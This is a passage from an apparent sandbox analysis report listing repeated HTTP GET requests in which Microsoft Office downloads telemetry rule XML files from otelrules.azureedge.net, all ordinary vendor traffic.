        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
